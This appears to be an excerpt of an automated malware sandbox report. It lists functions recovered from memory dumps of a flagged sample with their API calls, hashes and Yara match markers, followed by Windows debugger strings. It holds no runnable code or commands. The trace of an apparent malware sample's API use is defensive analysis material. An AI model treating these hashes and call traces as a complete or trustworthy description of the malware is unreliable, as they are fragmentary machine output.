                                      Uniqueness Score: -1.00%

                                      Function 03709A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: ab10b1178b5c7b98ac821e14b1ea8b7f63fb1a6ae9270003cdd5d2fc32502157
                                      • Instruction ID: fe86e1c95652919c2d02e22773849ef014f431e7640442be410796494f92aa1e
                                      • Opcode Fuzzy Hash: ab10b1178b5c7b98ac821e14b1ea8b7f63fb1a6ae9270003cdd5d2fc32502157
                                      • Instruction Fuzzy Hash: 7390026221185446E310A96D4C14B17044597D4343F51C525A0145554CCA5588717961
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: aa15f0e34fcb2a4bf6a9230d0ca5271b5508cc4328d71840ae401a8fac464150
                                      • Instruction ID: ec91aea79e45bce8cd10bd821fd868e70b61ce71e501e610aac399978e9f0feb
                                      • Opcode Fuzzy Hash: aa15f0e34fcb2a4bf6a9230d0ca5271b5508cc4328d71840ae401a8fac464150
                                      • Instruction Fuzzy Hash: B49002722010DC06E220A55D840475A044597D4341F55C821A4415658D87D588A17561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0796b17a002361932155bd75e05f82aab801aa5440741506c64035ff6ce8596d
                                      • Instruction ID: eab17eb215267baafb5931a8ef6805b0115d5cc20d45ef37e9154dd95c4b75f7
                                      • Opcode Fuzzy Hash: 0796b17a002361932155bd75e05f82aab801aa5440741506c64035ff6ce8596d
                                      • Instruction Fuzzy Hash: 6190027220105C46E210A55D4404B56044597E4341F51C426A0115654D8755C8617961
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0816a2d217b8d31b15f942d734016f38a09837c4ff1f0d77fb3a4024331cb783
                                      • Instruction ID: b1539bb99b8620cff3967cbb83460340e737877c1f0d69616d98118790304b36
                                      • Opcode Fuzzy Hash: 0816a2d217b8d31b15f942d734016f38a09837c4ff1f0d77fb3a4024331cb783
                                      • Instruction Fuzzy Hash: 64900266211054071215E95D0704517048697D9391351C431F1006550CD76188717561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4b4e32080ffa6796bebd325d391a02129c33c20b99e817ac4c58d1efcdad8518
                                      • Instruction ID: 97fe631fc245bd2c33c8d5057109611c06f5baccd5341ec3fe29592f5017e993
                                      • Opcode Fuzzy Hash: 4b4e32080ffa6796bebd325d391a02129c33c20b99e817ac4c58d1efcdad8518
                                      • Instruction Fuzzy Hash: AD9002B220105806E250B55D4404756044597D4341F51C421A5055554E87998DE57AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5cf465837521fc74a42786b63bf65a80620cc57fbe3bae12aacc2a3c686d3b23
                                      • Instruction ID: fc3727c1aeba433f566884b79c0c49c49cd4b4e152f3d2c56d2eeb26d9c13ae1
                                      • Opcode Fuzzy Hash: 5cf465837521fc74a42786b63bf65a80620cc57fbe3bae12aacc2a3c686d3b23
                                      • Instruction Fuzzy Hash: 3E9002A2202054075215B55D4414626444A97E4241B51C431E1005590DC66588A17565
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e3a06ee38b1e76086b02721cab702bbd02f8335661d7eb8d937a863f5b15d6c5
                                      • Instruction ID: 9d2959bdd21707cc5bd6f588ea8dcd99af5207d1838cd9e4976f683e6869d0a2
                                      • Opcode Fuzzy Hash: e3a06ee38b1e76086b02721cab702bbd02f8335661d7eb8d937a863f5b15d6c5
                                      • Instruction Fuzzy Hash: FB9002A234105846E210A55D4414B160445D7E5341F51C425E1055554D8759CC627566
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d7c36ff2ecf87efb5cf25b77342850943aa7c293d9ac6f02692b160c63d93e86
                                      • Instruction ID: 594228d29f42ac8f28fe7bc232e7a00a99ede0c2ba813d13b16e56aa7dc02c6d
                                      • Opcode Fuzzy Hash: d7c36ff2ecf87efb5cf25b77342850943aa7c293d9ac6f02692b160c63d93e86
                                      • Instruction Fuzzy Hash: DB90027220105817E221A55D4504717044997D4281F91C822A0415558D97968962B561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1450a3d20b44cfa3c594736b3d6787f4f5f55960fa6ae2c3c8991a7eee88a57a
                                      • Instruction ID: a40b551fe933aa51dfbf1e43d99c05002982dcbb242ca8a920780bdb8535d832
                                      • Opcode Fuzzy Hash: 1450a3d20b44cfa3c594736b3d6787f4f5f55960fa6ae2c3c8991a7eee88a57a
                                      • Instruction Fuzzy Hash: 75900262242095566655F55D44045174446A7E4281791C422A1405950C86669866FA61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC8C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02DC8CF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 6e1c106b626ac07d1ffb15a900548efa8ac42f27369cff5eb28c70a70ad8a73c
                                      • Instruction ID: d1ea89b591a6bdbd1606759e6523e98dadfa33bdf83705bb92a900fa5eac0b3d
                                      • Opcode Fuzzy Hash: 6e1c106b626ac07d1ffb15a900548efa8ac42f27369cff5eb28c70a70ad8a73c
                                      • Instruction Fuzzy Hash: 5931AFB2500245BBC725DF64D884FA7B7B8EF48700F10851DE62AAB340DB30BA50CFA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC8C46, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02DC8CF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 5c04a65dd2ce7a647335d7342690e9bbbcd88d522364d580f49787e9a66052c9
                                      • Instruction ID: 1042e61a69e4ba7e48b0457ef494290948ec09749e7cc3565d6392d98f5d8cf4
                                      • Opcode Fuzzy Hash: 5c04a65dd2ce7a647335d7342690e9bbbcd88d522364d580f49787e9a66052c9
                                      • Instruction Fuzzy Hash: C631C1B1900245BFC721DF64D885FABB7B8EF48704F10841DE659AB381D771E950DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DB3AF8), ref: 02DCA26D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 08d35c3f0484d83137696b677016e65141906b5721b8580a29db2e56ebd5820f
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: 8AE04FB12102086BD714DF59CC44EA777ADEF88750F114558FD0857341C630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA23D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DB3AF8), ref: 02DCA26D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 1b3660a3a78da1fdc2f4b1fa3c48a23ab81b0dd212df1f63a725cc35902c5be1
                                      • Instruction ID: 5c0cbf52625199874b5cb72ccb70cfdc499681e77421a6a04edd2505ece753cc
                                      • Opcode Fuzzy Hash: 1b3660a3a78da1fdc2f4b1fa3c48a23ab81b0dd212df1f63a725cc35902c5be1
                                      • Instruction Fuzzy Hash: D8E01AB5240614ABD714DF55CC44EA737AEEF88350F114659B91D97351C631E9118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DB82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DB834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DB836B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
                                      • Instruction ID: 264acdf790364f5ba5f5e30ee01b292106aae5d52da95bec52b63c5470911adb
                                      • Opcode Fuzzy Hash: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
                                      • Instruction Fuzzy Hash: DA01A731A80229BBE721A6959C02FFE776CAF40B51F154119FF05FA2C0E6D46D0646F5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DB8375, Relevance: 1.7, APIs: 1, Instructions: 155threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DB836B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: cf57fa5389a3a8ba6ed184e262487e886bae879be112109f6a8a0094fddf2737
                                      • Instruction ID: 777818f1ef6d16ac27524b41e40ae0e5bc6e7d8973ee8d4e0fd5b5e9fd181c44
                                      • Opcode Fuzzy Hash: cf57fa5389a3a8ba6ed184e262487e886bae879be112109f6a8a0094fddf2737
                                      • Instruction Fuzzy Hash: 2B515BB190020A9FDB25DF64D895BEB77ADEF48304F10446EE44A97341DB30AD41DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DBACC3, Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DBAD42
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: c643e5a7101b6301e02dd2fc1abc1c093126a2eb5aeaaf4f0c4c2ac19f028c65
                                      • Instruction ID: 2f238ef4f5f0e9b7d31ccddb6f6b6d307f76f81dc2537a3ac9908c7496fe09a5
                                      • Opcode Fuzzy Hash: c643e5a7101b6301e02dd2fc1abc1c093126a2eb5aeaaf4f0c4c2ac19f028c65
                                      • Instruction Fuzzy Hash: A0016DB5D4020AABDB11DA90DC51FDDB778EF05308F1082A9E9199B281F731DA59CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DBACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DBAD42
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                      • Instruction ID: 5a789cfa01e60440e561d86a81e1ccda31ff0f0e364faf6d1f95ef027abe2cea
                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                      • Instruction Fuzzy Hash: 15010CB5D4020EABDB10EAA4DD41FDEB3799F44208F104199AA0997240FA31EB59CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DCA304
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: bbfb5e7c28c58339c760e54191046af83b456dccf478411eaccf1b0007bad551
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: B001AFB2210108ABCB54DF89DC80EEB77AEAF8C754F158258BA0D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA2AD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DCA304
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: aa9eda4193022cbfa24365cbfcc0e9fb5c67ad97c7eb5c6d9b1d8f1c0c6ed567
                                      • Instruction ID: 5a316e84757daf88c0ab99514e34725976c02b15a384e3885bda5b6570454981
                                      • Opcode Fuzzy Hash: aa9eda4193022cbfa24365cbfcc0e9fb5c67ad97c7eb5c6d9b1d8f1c0c6ed567
                                      • Instruction Fuzzy Hash: E801AFB2210108ABCB58DF89DC80EEB77AEAF8C754F158258FA5D97251C630EC51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA30A, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DCA304
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 69f01f54976066bc18f0154dd88edf15e3e0027d8ed3b1b8a9c02cfb29897e63
                                      • Instruction ID: ad6b3ee9f6c1296342d9fc6f0513d734dd7691294b612f95ddd73362aa9989cc
                                      • Opcode Fuzzy Hash: 69f01f54976066bc18f0154dd88edf15e3e0027d8ed3b1b8a9c02cfb29897e63
                                      • Instruction Fuzzy Hash: 75F0BDB2215108BFCB54CF89DC80EEB77AEAF8C354F258249BA0D93250C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC8D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DBF020,?,?,00000000), ref: 02DC8DBC
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 3cefd60346042599f686949797791c99cfdbfa140840d651a850a684de9bf64d
                                      • Instruction ID: 408508bdb93c988965a4620a45166ad2ddfd759d17bc5c5b7f952b1f8cf4a3e7
                                      • Opcode Fuzzy Hash: 3cefd60346042599f686949797791c99cfdbfa140840d651a850a684de9bf64d
                                      • Instruction Fuzzy Hash: CDE092B33803143AE730659DAC02FA7B39CCB91B61F65002AFB0DEB2C0D995F80146A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC8D73, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DBF020,?,?,00000000), ref: 02DC8DBC
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 2f5c79edf98110e43cb5c9e017b71590dff58a20a1dcb70299171899228b3be8
                                      • Instruction ID: 911fde367e023d5a342355a708afbd06931993744e8ab147ce00cc6c5af2918c
                                      • Opcode Fuzzy Hash: 2f5c79edf98110e43cb5c9e017b71590dff58a20a1dcb70299171899228b3be8
                                      • Instruction Fuzzy Hash: DCF0E5B32803003BD6316A688C02FE7779DCF92B10F250019F64AAB3C1C6D5F80187E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA396, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DBF1A2,02DBF1A2,?,00000000,?,?), ref: 02DCA3D0
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 7290e8001de2115a4a183a4d8b937b17cd33db5c60da70f52ee19062440f8f0e
                                      • Instruction ID: eb506318e0653beae85dddb4e0698fa42e75bf92cde9fce58f5e04388bf8304b
                                      • Opcode Fuzzy Hash: 7290e8001de2115a4a183a4d8b937b17cd33db5c60da70f52ee19062440f8f0e
                                      • Instruction Fuzzy Hash: 8DE06DB12002086BC720DF48CC84FEB77AAEF85714F108268F9085B282CA34E8118BF1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DBF1A2,02DBF1A2,?,00000000,?,?), ref: 02DCA3D0
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 802bec2421b8ebf030ad74d57c61fb6704d9c68d1d1032ddf9a2e32dbabfe1ba
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: E2E01AB12002086BDB10DF49CC84EE737AEEF88650F118154BA0857241C930E8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DBF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,02DB8CF4,?), ref: 02DBF6CB
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                      • Instruction ID: 5a17658767d59187e9a85054f46f0a580c59cdb0e74e930cadca793c3213433c
                                      • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                      • Instruction Fuzzy Hash: 74D0A7717903043BE610FBA49C13F6732CE9B44B04F490064FA49D73C3DD50E8008575
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0370967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6bd4bdce35ae3f8c89e271dc4f3e1f89eff82830d0c38475905df9bb30db6bd3
                                      • Instruction ID: d1aceb08682dbe8ae20d728ee8783698a65bc5afa47375eeb52309f4bab032c7
                                      • Opcode Fuzzy Hash: 6bd4bdce35ae3f8c89e271dc4f3e1f89eff82830d0c38475905df9bb30db6bd3
                                      • Instruction Fuzzy Hash: 70B09B729014D5C9E711D764460872B7D4477D5741F16C561D2020645B4778C091F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0377B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                      Download Yara Rule
                                      Strings
                                      • read from, xrefs: 0377B4AD, 0377B4B2
                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0377B305
                                      • The resource is owned exclusively by thread %p, xrefs: 0377B374
                                      • Go determine why that thread has not released the critical section., xrefs: 0377B3C5
                                      • write to, xrefs: 0377B4A6
                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0377B39B
                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0377B53F
                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0377B38F
                                      • The instruction at %p tried to %s , xrefs: 0377B4B6
                                      • *** enter .exr %p for the exception record, xrefs: 0377B4F1
                                      • *** enter .cxr %p for the context, xrefs: 0377B50D
                                      • *** Inpage error in %ws:%s, xrefs: 0377B418
                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0377B48F
                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0377B2DC
                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0377B3D6
                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0377B352
                                      • an invalid address, %p, xrefs: 0377B4CF
                                      • The instruction at %p referenced memory at %p., xrefs: 0377B432
                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0377B47D
                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0377B484
                                      • a NULL pointer, xrefs: 0377B4E0
                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0377B2F3
                                      • *** then kb to get the faulting stack, xrefs: 0377B51C
                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0377B314
                                      • The critical section is owned by thread %p., xrefs: 0377B3B9
                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0377B476
                                      • The resource is owned shared by %d threads, xrefs: 0377B37E
                                      • <unknown>, xrefs: 0377B27E, 0377B2D1, 0377B350, 0377B399, 0377B417, 0377B48E
                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0377B323
                                      • This failed because of error %Ix., xrefs: 0377B446
                                      Memory Dump Source
